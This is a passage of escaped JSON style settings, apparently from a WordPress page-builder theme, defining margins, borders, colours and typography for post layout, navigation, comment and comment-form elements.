0.15)\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"props\":{\"attrs\":{\"overflowOption\":\"hidden\"}}},{\"id\":67,\"type\":\"hop-section\",\"nodeId\":\"16-m29\",\"nodes\":[\"432-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"v\":\"1.1\",\"props\":{\"width\":\"boxed\"}},{\"id\":68,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"16-m33\",\"nodes\":[\"432-m25\"],\"v\":\"1.1\"},{\"id\":69,\"type\":\"hop-column\",\"nodeId\":\"16-m34\",\"nodes\":[\"432-m26\"],\"v\":\"1.1\"},{\"id\":70,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"16-m35\",\"nodes\":[\"432-m27\"],\"v\":\"1.1\"},{\"id\":71,\"type\":\"hop-text\",\"nodeId\":\"16-m36\",\"nodes\":[\"432-m28\"],\"v\":\"1.1\"},{\"id\":72,\"type\":\"hop-post-loop\",\"nodeId\":\"23-m35\",\"style\":{\"background\":{\"color\":\"\"}},\"v\":\"1.1\",\"nodes\":[\"432-m3\"]},{\"id\":73,\"type\":\"hop-loop-item\",\"nodeId\":\"23-m36\",\"v\":\"1.1\",\"nodes\":[\"432-m4\"],\"style\":{\"background\":{\"color\":\"\"},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":74,\"type\":\"hop-post-thumbnail\",\"nodeId\":\"23-m37\",\"style\":{\"background\":{\"color\":\"rgba(255,255,255,0)\"}},\"v\":\"1.1\",\"nodes\":[\"432-m5\"]},{\"id\":75,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"itemsPerRow\":1,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"type\":\"hop-row\",\"nodeId\":\"1723-m26\",\"v\":\"1.1\",\"nodes\":[\"432-m6\"]},{\"id\":76,\"type\":\"hop-column\",\"nodeId\":\"1723-m27\",\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"v\":\"1.1\",\"nodes\":[\"432-m7\"],\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}},{\"id\":77,\"type\":\"hop-post-meta\",\"nodeId\":\"26-m15\",\"v\":\"1.1\",\"nodes\":[\"432-m8\"],\"style\":{\"descendants\":{\"metaDataLinks\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"weight\":\"400\",\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}},\"icons\":{\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"display\":\"none\",\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\"}}}},\"metaDataPrefix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}}}},{\"id\":78,\"type\":\"hop-post-content\",\"nodeId\":\"23-m40\",\"v\":\"1.1\",\"nodes\":[\"432-m9\"],\"style\":{\"descendants\":{\"content\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"holders\":{\"p\":{\"color\":\"${theme.colors.5|variant2}\"}}}}}}},{\"id\":79,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-categories-container\",\"nodeId\":\"16-m34\",\"nodes\":[\"432-m10\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":80,\"type\":\"hop-column\",\"nodeId\":\"16-m38\",\"nodes\":[\"432-m11\"],\"v\":\"1.1\",\"props\":{\"verticalAlign\":\"center\"}},{\"id\":81,\"type\":\"hop-text\",\"nodeId\":\"16-m39\",\"nodes\":[\"432-m12\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":82,\"type\":\"hop-column\",\"nodeId\":\"16-m36\",\"nodes\":[\"432-m13\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"},\"props\":{\"verticalAlign\":\"center\"}},{\"id\":83,\"type\":\"hop-post-categories\",\"nodeId\":\"16-m37\",\"nodes\":[\"432-m14\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"categoriesLinks\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}},\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.4|variant2}\",\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}}}}},{\"id\":84,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":0,\"verticalGap\":0,\"equalHeight\":false}},\"type\":\"hop-post-tags-container\",\"nodeId\":\"16-m30\",\"nodes\":[\"432-m15\"],\"v\":\"1.1\"},{\"id\":85,\"type\":\"hop-column\",\"nodeId\":\"16-m40\",\"nodes\":[\"432-m16\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"verticalAlign\":\"center\"}},{\"id\":86,\"type\":\"hop-text\",\"nodeId\":\"16-m41\",\"nodes\":[\"432-m17\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"400\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"props\":{\"type\":\"normal\"}},{\"id\":87,\"type\":\"hop-column\",\"nodeId\":\"16-m32\",\"nodes\":[\"432-m18\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"vSpace\":{\"value\":23}},\"verticalAlign\":\"center\"}},{\"id\":88,\"type\":\"hop-post-tags\",\"nodeId\":\"16-m33\",\"nodes\":[\"432-m19\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"tagsLinks\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}},\"typography\":{\"color\":\"${theme.colors.4|variant2}\",\"decoration\":\"none\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"tagsPrefix\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}}}}},{\"id\":89,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"16-m39\",\"nodes\":[\"432-m20\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}}},{\"id\":90,\"type\":\"hop-column\",\"nodeId\":\"16-m40\",\"nodes\":[\"432-m21\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":91,\"type\":\"hop-post-nav-button\",\"nodeId\":\"23-m48\",\"v\":\"1.1\",\"nodes\":[\"432-m22\"],\"style\":{\"descendants\":{\"navigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"none\",\"color\":\"black\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"none\",\"color\":\"black\"},\"left\":{\"style\":\"none\",\"color\":\"black\"},\"right\":{\"style\":\"none\",\"color\":\"black\"}},\"background\":{\"color\":\"\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"navigationTitle\":{\"maxWidth\":{\"value\":\"40\",\"unit\":\"ch\"}}}}},{\"id\":92,\"type\":\"hop-column\",\"nodeId\":\"16-m41\",\"nodes\":[\"432-m23\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"right\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":93,\"type\":\"hop-post-nav-button\",\"nodeId\":\"23-m49\",\"v\":\"1.1\",\"nodes\":[\"432-m24\"],\"style\":{\"descendants\":{\"navigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}}},{\"id\":94,\"type\":\"hop-section\",\"nodeId\":\"16-m55\",\"nodes\":[\"432-m29\"],\"style\":{\"padding\":{\"top\":{\"value\":0},\"bottom\":{\"value\":0}}},\"v\":\"1.1\"},{\"id\":95,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"16-m59\",\"nodes\":[\"432-m34\"],\"v\":\"1.1\"},{\"id\":96,\"type\":\"hop-column\",\"nodeId\":\"16-m60\",\"nodes\":[\"432-m35\"],\"v\":\"1.1\"},{\"id\":97,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"16-m61\",\"nodes\":[\"432-m36\"],\"v\":\"1.1\"},{\"id\":98,\"type\":\"hop-text\",\"nodeId\":\"16-m62\",\"nodes\":[\"432-m37\"],\"v\":\"1.1\"},{\"id\":99,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":0,\"verticalGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"type\":\"hop-row\",\"nodeId\":\"16-m56\",\"nodes\":[\"432-m30\"],\"v\":\"1.1\"},{\"id\":100,\"type\":\"hop-column\",\"nodeId\":\"16-m57\",\"nodes\":[\"432-m31\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"0\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"}},\"textAlign\":\"left\",\"media\":{\"tablet\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}},{\"id\":101,\"type\":\"hop-post-comments\",\"nodeId\":\"1723-m26\",\"v\":\"1.1\",\"nodes\":[\"432-m32\"],\"style\":{\"descendants\":{\"commentsTitle\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5}\",\"weight\":\"600\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"em\",\"value\":\"1.25\"}}},\"commentInfo\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}},\"background\":{\"color\":\"\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"transition\":{\"duration\":{\"value\":\"0.5\"}}},\"commentText\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"holders\":{\"p\":{\"color\":\"${theme.colors.5|variant2}\"},\"a\":{\"states\":{\"hover\":{\"color\":\"${theme.colors.0|variant3}\"}}}}}},\"commentAuthorName\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\",\"style\":\"normal\",\"weight\":\"600\"},\"background\":{\"color\":\"\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"disabledComments\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant2}\"}},\"comment\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}}},\"commentAvatar\":{\"width\":{\"value\":30},\"height\":{\"value\":30},\"background\":{\"color\":\"\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"commentsContainer\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"commentReply\":{\"typography\":{\"color\":\"${theme.colors.0}\",\"size\":{\"unit\":\"em\",\"value\":\"1\"},\"transform\":\"lowercase\",\"weight\":\"400\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.5\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"alternateComment\":{\"background\":{\"color\":\"rgba(166, 220, 244, 0.1)\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}}},\"commentReplies\":{\"margin\":{\"left\":{\"value\":\"12\"}}},\"commentInfoContainer\":{\"typography\":{\"color\":\"${theme.colors.4|variant2}\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"16\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}}},{\"id\":102,\"type\":\"hop-post-comment-form\",\"nodeId\":\"23-m32\",\"v\":\"1.1\",\"nodes\":[\"432-m33\"],\"style\":{\"descendants\":{\"commentFormTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"em\",\"value\":\"1.25\"},\"weight\":\"600\",\"family\":\"Open Sans\"}},\"commentFormLabels\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"commentFormButton\":{\"background\":{\"color\":\"${theme.colors.0}\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"24\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"24\",\"unit\":\"px\"}},\"typography\":{\"color\":\"${theme.colors.4}\",\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"transform\":\"uppercase\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"1\"}}},\"commentFormInputs\":{\"border\":{\"top\":{\"color\":\"rgb(238, 238, 238)\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"right\":{\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"color\":\"rgb(238, 238, 238)\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"typography\":{\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"color\":\"${theme.colors.5|variant2}\"},\"background\":{\"color\":\"rgba(0,0,0,0)\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"commentFormNotes\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":103,\"type\":\"hop-main\",\"nodeId\":\"68-m1\",\"v\":\"1.1\",\"nodes\":[\"435-m1\"],\"style\":{\"margin\":{\"top\":{\"value\":\"-30\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"-15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}}},{\"id\":104,\"type\":\"hop-section\",\"nodeId\":\"19-m36\",\"nodes\":[\"435-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}}},\"v\":\"1.1\"},{\"id\":105,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"19-m40\",\"nodes\":[\"435-m25\"],\"v\":\"1.1\"},{\"id\":106,\"type\":\"hop-column\",\"nodeId\":\"19-m41\",\"nodes\":[\"435-m26\"],\"v\":\"1.1\"},{\"id\":107,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"19-m42\",\"nodes\":[\"435-m27\"],\"v\":\"1.1\"},{\"id\":108,\"type\":\"hop-text\",\"nodeId\":\"19-m43\",\"nodes\":[\"435-m28\"],\"v\":\"1.1\"},{\"id\":109,\"type\":\"hop-archive-loop\",\"nodeId\":\"26-m6\",\"props\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":3,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":2,\"horizontalAlign\":\"start\",\